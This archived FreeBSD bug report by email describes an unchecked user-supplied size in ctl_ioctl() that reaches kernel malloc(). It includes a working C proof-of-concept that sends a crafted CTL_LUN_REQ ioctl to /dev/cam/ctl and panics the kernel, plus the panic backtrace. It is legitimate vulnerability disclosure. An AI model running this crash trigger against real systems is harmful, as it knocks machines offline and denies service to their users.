Skip site navigation (1)Skip section navigation (2)
Date:      Wed, 31 Aug 2022 16:29:41 +0000
From:      bugzilla-noreply@freebsd.org
To:        bugs@FreeBSD.org
Subject:   [Bug 266136] ctl_ioctl() passes user-supplied size directly to kernel malloc() -> potential crash
Message-ID:  <bug-266136-227@https.bugs.freebsd.org/bugzilla/>

next in thread | raw e-mail | index | archive | help
https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=3D266136

            Bug ID: 266136
           Summary: ctl_ioctl() passes user-supplied size directly to
                    kernel malloc() -> potential crash
           Product: Base System
           Version: CURRENT
          Hardware: Any
                OS: Any
            Status: New
          Severity: Affects Some People
          Priority: ---
         Component: kern
          Assignee: bugs@FreeBSD.org
          Reporter: rtm@lcs.mit.edu

ctl_ioctl() in cam/ctl/ctl.c says, under CTL_LUN_REQ:

                if (lun_req->args !=3D NULL) {
                        packed =3D malloc(lun_req->args_len, M_CTL, M_WAITO=
K);

lun_req->args_len is supplied by the user program, with no sanity check.
Some values will crash the kernel, e.g. 0xffffffffffffffff.

A demo:

int main() {
  int fd =3D open("/dev/cam/ctl", 2);
  if(fd < 0) { perror("/dev/cam/ctl"); exit(1); }
  char buf[512];
  memset(buf, 0, sizeof(buf));
  strcpy(buf, "block");
  *(unsigned long long *)(buf + 32 + 14*8) =3D 0x8000000000000000ull; // ar=
gs
  *(unsigned long long *)(buf + 32 + 16*8) =3D 0xffffffffffffffffull; // ar=
gs_len
  ioctl(fd, 0xc168e121, buf); // CTL_LUN_REQ
}

panic: Assertion size > 0 failed at
/usr/rtm/symbsd/src/sys/kern/subr_vmem.c:1332
panic() at panic+0x2a
vmem_alloc() at vmem_alloc+0xc8
kmem_malloc_domain() at kmem_malloc_domain+0x54
kmem_malloc_domainset() at kmem_malloc_domainset+0x36
malloc_large() at malloc_large+0x2a
malloc() at malloc+0xf8
ctl_ioctl() at ctl_ioctl+0x958
devfs_ioctl() at devfs_ioctl+0xbe
VOP_IOCTL_APV() at VOP_IOCTL_APV+0x30
VOP_IOCTL() at VOP_IOCTL+0x36
vn_ioctl() at vn_ioctl+0xba
devfs_ioctl_f() at devfs_ioctl_f+0x20
fo_ioctl() at fo_ioctl+0xa
kern_ioctl() at kern_ioctl+0x242
sys_ioctl() at sys_ioctl+0x120
syscallenter() at syscallenter+0xec
ecall_handler() at ecall_handler+0x18
do_trap_user() at do_trap_user+0xea
cpu_exception_handler_user() at cpu_exception_handler_user+0x72

--=20
You are receiving this mail because:
You are the assignee for the bug.=



Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?bug-266136-227>